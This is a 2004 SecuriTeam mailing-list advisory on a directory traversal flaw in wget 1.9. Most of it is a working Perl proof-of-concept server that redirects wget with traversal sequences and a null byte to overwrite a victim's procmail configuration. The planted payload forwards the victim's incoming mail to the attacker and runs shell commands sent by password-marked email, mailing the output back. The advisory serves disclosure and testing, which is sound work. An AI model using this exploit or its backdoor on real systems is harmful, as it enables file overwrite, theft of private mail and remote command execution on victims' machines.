[EXPL] wget Directory Traversal (Exploit)
From: SecuriTeam (support_at_securiteam.com)
Date: 12/15/04
- Previous message: SecuriTeam: "[UNIX] Linux Kernel scm_send Local DoS Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 15 Dec 2004 17:48:22 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
wget Directory Traversal (Exploit)
------------------------------------------------------------------------
SUMMARY
wget is "a freely available utility for downloading files using the HTTP,
HTTPS, and FTP protocols on Linux-based operating systems".
wget allows a remote attacker in control of a malicious HTTP server to
traverse directories and create or overwrite files on a victim's computer.
If a remote attacker could force a victim to visit the malicious HTTP
server, the attacker could use specially-crafted file names containing the
absolute path to the targeted directory or "dot dot" sequences (/../) to
traverse directories and create or overwrite files with the same
privileges as the wget user. The following exploit code can be used to
test your system for the mentioned vulnerability.
DETAILS
Vulnerable Systems:
* wget version 1.9
Exploit:
#!/usr/bin/perl -W
# wgettrap.poc -- A POC for the wget(1) directory traversal vulnerability
#
# Copyright 2004 Jan Min=C3=A1=C5=99 (jjminar fastmail fm)
# License: Public Domain - SECU
#
# When wget connects to us, we send it a HTTP redirect constructed so that
wget
# wget will connect the second time, it will be attempting to override
# ~/.procm4ilrc (well, provided that the user running wget has username
'jan'
# 8-)).
use POSIX qw(strftime);
# This is our scheme/host/port
$server =3D "http://localhost:31340";
# Use this + DNS poisoning with wget 1.9 & CVS
#$server =3D "http://..";
# Wanna know who got infected?=20
#$log =3D "/dev/pts/1";
# The filename we will try to overwrite on the target system
$filename =3D
"/home/jan/.procm4ilrc%00This%20part%20will%20be%20ignored.";
############### Payload #########################################
$email =3D 'your@mailbox';
$password =3D 'Pmrpuf ner cevzvgvirf';
$payload =3D <<EOP;
:0c
| mail -s 'Wgettrap mail copy' $email
:0
* ^X-Wgettrap-Command: shell
* ^X-Wgettrap-Password: $password
| /bin/sh -c '/bin/sh | mail -s "Wgettrap shell output" $email'
EOP
chomp $payload;
############### Payload #########################################
# A simple directory traversal, for greater effect
$trick =3D "/.." . "%2f.." x 40;
open LOG, ">$log" if $log;
while(<STDIN>){
print LOG $_ if $log;
if (/\Q$trick$filename\E/) {
#if (/%2f/) {
# We see the filename, so this is the second time
# they're here. Time to feed the sploit.
$second++;
} elsif (/^Range: bytes=3D\(33\)-/) {
# Appending goes like this:
# (1) Tell'em what you're gonna tell'em
# (2) Then tell'em just a half
# (3) Close it
# (4) Wait
# (5) They're comin' back, with wget -c
# (6) Tell'em the sploit
# (7) Close again
# (8) Wtf? They're comin' back with wget -c again
# (9) Tell'em the rest...
# (10) ... enjoying the backdoor at the same time
print LOG "File if $1 bytes long\n" if $log;
} elsif (/^\r?$/) {
# The HTTP headers are over. Let's do it!
$date =3D strftime ("%a, %e %b %Y %H:%M:%S %z", localtime);
if (!$second) {
# Print the payload
print <<EOT;
HTTP/1.1 301 Moved Permanently\r
Date: $date\r
Server: wgettrap 1.1\r
Accept-Ranges: bytes\r
Location: $server$trick$filename\r
Content-Length: 43\r
Connection: close\r
Content-Type: text/html\r
\r
<html><head><title></title></head></html>\r
EOT
} else {
# Print the redirection
print <<EOT;
HTTP/1.1 200 OK\r
Date: $date\r
Server: wgettrap 1.1\r
Accept-Ranges: bytes\r
Content-Length: 25\r
Connection: close\r
Content-Type: text/plain\r
\r
$payload
EOT
}
exit 0;
}
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:jjminar@fastmail.fm>
jjminar.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[UNIX] Linux Kernel scm_send Local DoS Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
